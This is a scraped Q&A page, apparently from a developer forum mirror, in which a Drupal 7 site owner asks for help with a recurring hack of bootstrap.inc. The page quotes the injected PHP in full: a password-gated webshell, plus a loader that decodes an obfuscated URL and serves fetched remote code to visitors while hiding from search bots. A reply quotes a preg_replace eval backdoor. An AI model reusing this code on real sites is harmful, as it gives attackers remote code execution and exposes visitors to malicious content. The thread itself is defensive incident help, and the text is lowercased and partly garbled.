drupal - includes/bootstrap.inc hacked/changed constantly -


my hosting provider warned me bootstrap.inc file connecting infected host. issue meant happening between 771 , 808 line of includes/bootstrap.inc file (code below).

this file somehow changed (once week), 120kb 123kbs. wherever happens, try upload clean file. if file changed/hacked, hosting response longer 10-15 seconds.

the drupal 7 updated 7.41, modules date. code that's causing issue, somewhere between lines (i suspect "cookie" part). infected/added part hosting provider warned me about:

$_passssword = '2505363ea355401256fe974720d85db8'; $p = $_post; if (@$p[$_passssword] , @$p['a'] , @$p['c']) @$p[$_passssword](@$p['a'],   @$p['c'], '');  if (!empty($_get['check']) , $_get['check'] == $_passssword) { echo('<!--checker_start '); $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'); echo(substr($tmp, 50)); echo(' checker_end-->'); } unset($_passssword);  $bad_url = false; foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') $regex) { if (preg_match($regex, $_server['request_uri'])) {     $bad_url = true;     break; } }  $cookie_name = 'php_session_php'; if (!$bad_url , !isset($_cookie[$cookie_name]) , empty($echo_done) , !empty($_server['http_user_agent']) , (substr(trim($_server['remote_addr']), 0, 6) != '74.125') , !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_server['http_user_agent'])) {  //    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');  //        $url = base64_decode('a3d3czkslda2lts0ltuwltoxlgfvbgqspgjvc2tijxz3blxwbhzxygy+ndmwmdc5ndsymjcyoti6mje='); $url = decrypt_url('a3d3czkslda2lts0ltuwltoxlgfvbgqspgjvc2tijxz3blxwbhzxygy+ndmwmdc5ndsymjcyoti6mje='); $code = request_url_data($url); //    if (!empty($code) , base64_decode($code) , preg_match('#[a-za-z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) , $decoded = base64_decode($code, true)) {     $echo_done = true;     print $decoded; } }//iend

i'm no back-end developer , i've been using bootstrap hobby related-project on 8 years.

i tried clean d7 (reuploaded fresh includes, modules , apart /sites/). tried check on popular scanners.

does have idea, how block changes bootstrap.inc? there successful tools that, or modules scanning? or maybe recognizes exploit , give me tip coming from?

thank in advance.

i had same hack on drupal site. code put in bootstrap.inc file looked identical yours.

apart of changes bootstrap.inc hackers installed multiple backdoors in various modules. able find backdoors using hacked module, allows find modified files.

the backdoors in drupal looked similar code:

<?php @preg_replace('/(.*)/e', @$_post['ttqdgkkfkolmt'], '');

this code uses vulnerability in preg_replace, allows attackers execute random php code using simple http post request. (the preg_replace vulnerably resolved in php version > 5.5)

hope helped. luck finding backdoors!


Comments

Post a Comment

Popular posts from this blog

php - Wordpress website dashboard page or post editor content is not showing but front end data is showing properly -

Image
recently have uploaded wordpress site onto server. have uploaded wordpress site in sub-folder under root folder ../root(domain root folder)/wordpress (where host wordpress folder). now problem content data in page or post in dashboard of wordpress admin panel not showing - see image. but data showing in front view - see image. if not browser cache issue , not issue happened tinymce editor during upgrade; try add config file: define('concatenate_scripts', false);
Read more

How to get the ip address of VM and use it to configure SSH connection dynamically in Ansible -

i trying ip address of vm , trying use establish ssh vm. following script: --- - hosts: localhost become: yes connection: local gather_facts: false serial: 1 vars_files: - createvmvars.yml tasks: - name: gathering vm info. vsphere_guest: vcenter_hostname: "{{vcenter_hostname}}" username: "{{vcenter_username}}" password: "{{vcenter_password}}" guest: "{{guest_name}}" vmware_guest_facts: yes register: var - debug: msg="{{var.ansible_facts.hw_eth0.ipaddresses[0]}}" - name: establishing ssh connection. script: /home/shasha/devops/scripts/ssh_configure.sh "{{var.ansible_facts.hw_eth0.ipaddresses[0]}}" following content of ssh_configure.sh : #!/bin/sh ssh-keygen -t rsa ssh-copy-id $1 but when running playbook, getting following error while executing third task: error! 'var' undefined but debug module(second task) printin
Read more

javascript - Get parameter of GET request -

i make request: createxhrrequest( "get", fileurl, function( err, response ) { if( err ) { alert( "error get!" ); } alert(response); }); and full response: { "status" : "ok", "message" : "jvberi0xljqkjdduxdgkmy how can jvberi0xlj ? i try response.message , response["message"]. nothing works. just simple access this: var json = json.parse(response); json.message
Read more